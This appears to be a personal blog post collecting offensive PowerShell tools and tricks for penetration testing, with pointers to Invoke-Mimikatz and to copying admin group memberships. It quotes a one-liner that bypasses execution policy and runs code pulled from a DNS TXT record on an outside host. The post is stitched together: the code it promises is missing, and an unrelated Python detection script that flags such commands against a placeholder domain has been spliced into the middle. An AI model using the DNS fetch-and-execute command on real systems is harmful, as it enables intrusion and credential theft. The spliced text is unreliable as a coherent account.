I’m never quite sure how to start these off, but I figure we start with a personal and possibly sacrilegious anecdote. There was a time when I hated PowerShell.
You can go ahead and crucify me now; however, I just had a really hard time finding value in it. I think that this changed when I saw how truly powerful PowerShell was while providing little additional value to security. There are so many awesome people doing amazing and mysterious things with PowerShell. I’m hoping I can compile my “Greatest Hits” collection here.
- PowerSploit - A great collection of offensive PowerShell scripts.
- Empire - Think Metasploit, but in PowerShell. This framework has integrated itself into my pentesting toolkit and I don’t think I will ever drop it.
- NPS (aka Not PowerShell) - This is an executable that functions… well… like PowerShell.
- nishang - Another collection of offensive PowerShell scripts.
- Metasploit even has PowerShell payloads.
I’m standing on the shoulders of giants here and I really think people should be focusing on these folks:
- harmj0y - Everything harmj0y touches is gold.
- Tim Medin
- Vincent Yiu - Vincent has made some great tweets that really spawned this whole blog post.
We might want to import functions directly into memory. Invoke-Mimikatz, for example.
I think a lot of folks like running encoded PowerShell commands. Here’s how I generate the Base64 encoded commands:
Vincent Yiu shared a really interesting alternative to IEX.
Imagine a world where you can execute commands stored in DNS TXT records…
No need for IEX cc @MDSecLabs : powershell -ep bypass -nop -c “powershell . ((nslookup.exe -q=txt http://calc.vincentyiu.co.uk ))”
I wanted to store Base64 encoded commands in a DNS TXT record, but unfortunately there’s a limit of 255 characters.
So I split them up across multiple records, and here’s my first attempt…
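For the defender side of the two tricks above (Base64 `-EncodedCommand` arguments and commands sourced from DNS TXT records), here is a triage helper that decodes the encoded payload and flags the `nslookup -q=txt` pattern in process-creation command lines. This is an added example, not code from the original post; the sample command lines and the `example.invalid` domain are constructed.

```python
import base64
import re

# Constructed process-creation command lines (not from the original post), of
# the kind Sysmon event 1 or Windows 4688 would record. The first one encodes
# "Write-Host hello" the way -EncodedCommand expects: UTF-16LE, then Base64.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -EncodedCommand "
    + base64.b64encode("Write-Host hello".encode("utf-16le")).decode(),
    'powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt example.invalid))"',
    "powershell.exe -Command Get-Process",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
# so match "-e<letters> <base64>" first and check the prefix afterwards.
ENCODED_FLAG = re.compile(r"(?i)(?<![\w-])-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")
# nslookup TXT lookup used as a command source, as in the tweet quoted above.
DNS_TXT = re.compile(r"(?i)nslookup(?:\.exe)?\s+-(?:q|query|type)=txt\s+([^\s)]+)")
EP_BYPASS = re.compile(r"(?i)-e(?:p|x[a-z]*)\s+bypass")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    for m in ENCODED_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. "-ep bypass" is ExecutionPolicy, not EncodedCommand
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None  # flag present, but payload is not valid UTF-16LE Base64
    return None


def triage(cmdline):
    """Summarise the PowerShell-specific indicators found in one command line."""
    result = {"encoded_command": None, "dns_txt_domain": None, "flags": []}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        result["encoded_command"] = decoded
        result["flags"].append("encoded-command")
    m = DNS_TXT.search(cmdline)
    if m:
        result["dns_txt_domain"] = m.group(1)
        result["flags"].append("dns-txt-command-source")
    if EP_BYPASS.search(cmdline):
        result["flags"].append("execution-policy-bypass")
    return result
```

Run `triage()` over each entry of `SAMPLE_COMMAND_LINES` to see the decoded script and the flags raised for each line.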
Clone the group memberships from an existing administrative account to a new (or existing) account.
I am totally aware that this is an incomplete list with nothing too special on it. Do not despair - I will add things as I learn them.